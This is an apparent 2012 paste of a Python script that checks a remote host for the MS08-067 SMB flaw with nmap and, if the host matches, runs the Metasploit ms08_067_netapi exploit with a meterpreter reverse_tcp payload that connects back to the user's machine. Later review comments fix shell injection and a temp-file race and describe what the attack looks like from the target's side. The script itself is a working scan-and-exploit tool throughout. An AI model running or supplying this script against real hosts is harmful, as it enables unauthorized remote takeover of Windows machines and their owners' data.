THN - SMB checker and exploiter ‘MS08-067’

a guest
Jun 10th, 2012
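#!/usr/bin/env python
#
# File_Name: SMB checker and exploiter 'MS08-067'
# Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
# Thanks: Dave Relik from #social-engineer --> freenode
# home: live.isecur1ty.org lnxg33k.wordpress.com
#
# Review notes on this revision of the paste:
#   * The original built every command as a shell string from sys.argv and
#     ran it with shell=True while running as root, so any shell
#     metacharacter in an argument was executed as root. Commands are now
#     passed as argument lists and the arguments are checked first.
#   * The original wrote the scan report to the fixed path /tmp/nmap.txt as
#     root. A fixed name in a world-writable directory can be pre-created or
#     symlinked by another local user; the report now goes to a private file
#     created by tempfile.mkstemp and is removed on every exit path.
#   * A failed scan is no longer reported as "not vulnerable", and the final
#     success line is no longer printed when the framework exits with an
#     error.
#   * What this looks like from the target's side: a probe of TCP/445
#     followed, if the check matches, by a connection from the target back
#     to LocalHost:LocalPort (the reverse_tcp payload). Hosts carrying the
#     MS08-067 security update do not match the check.

import os
import re
import subprocess
import sys
import tempfile

# Presumably required because the nmap SYN scan (-sS) needs raw-socket
# privileges; the check itself only compares the effective uid with 0.
if os.getuid() != 0:
    print('requires root privileges.')
    sys.exit(1)


def usage():
    """Print the expected command line and exit(1) unless exactly three arguments were given."""
    if len(sys.argv) != 4:
        print('Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]')
        print('EX) ./smb.py 192.168.1.50 192.168.1.6 443')
        sys.exit(1)


usage()

print("""
************************************************
**\tSMB checker and exploiter 'MS08-067' \t**
**\tWritten by: Ahmed Shawky aka lnxg33k \t**
**\tThanks: Dave Relik @ #social-engineer\t**
************************************************
""")

RHOST = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

# RHOST is handed to nmap as a bare argument, so a value starting with '-'
# would be parsed as an nmap option rather than as a target.
if not RHOST or RHOST.startswith('-'):
    print('invalid RemoteHost: %r' % RHOST)
    sys.exit(1)

# LPORT must be a plain TCP port number.
if not LPORT.isdigit() or not 1 <= int(LPORT) <= 65535:
    print('invalid LocalPort: %r' % LPORT)
    sys.exit(1)

# mkstemp creates the file with an unpredictable name and owner-only
# permissions; nmap then overwrites that existing private file.
report_fd, report_path = tempfile.mkstemp(prefix='nmap-', suffix='.txt')
os.close(report_fd)
try:
    # NOTE(review): later Nmap releases appear to have split
    # smb-check-vulns.nse into separate per-issue scripts; where the script
    # is missing nmap should exit with an error, which is reported below as
    # a failed scan -- confirm against the installed version.
    scan_status = subprocess.call([
        'nmap', '-sS', '-p445', '--script', 'smb-check-vulns.nse',
        '-oN', report_path, RHOST,
    ])
    if scan_status != 0:
        # An empty or partial report must not be read as a clean result.
        print('\nnmap exited with status %d; no result' % scan_status)
        sys.exit(1)
    with open(report_path, 'r') as report:
        reader = report.read()
finally:
    os.remove(report_path)

# Matches only the exact report line "|   MS08-067: VULNERABLE". Any other
# outcome (host down, port filtered, a differently worded verdict) falls
# through to the message below, so that message means "marker line absent",
# not "confirmed patched".
found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader)
if not found:
    print('\nSystem is not vulnerable')
    sys.exit(1)

print('\nLooks like it\'s a vulnerable host')
print('I will exploit it for you\n')

msf_status = subprocess.call([
    'msfcli', 'exploit/windows/smb/ms08_067_netapi',
    'PAYLOAD=windows/meterpreter/reverse_tcp',
    'RHOST=%s' % RHOST, 'LHOST=%s' % LHOST, 'LPORT=%s' % LPORT, 'E',
])
if msf_status != 0:
    print('msfcli exited with status %d' % msf_status)
    sys.exit(msf_status)

# A zero exit status only shows that msfcli ended without an error; it is
# not evidence of what happened on the remote host.
print('[**] Nice PWN')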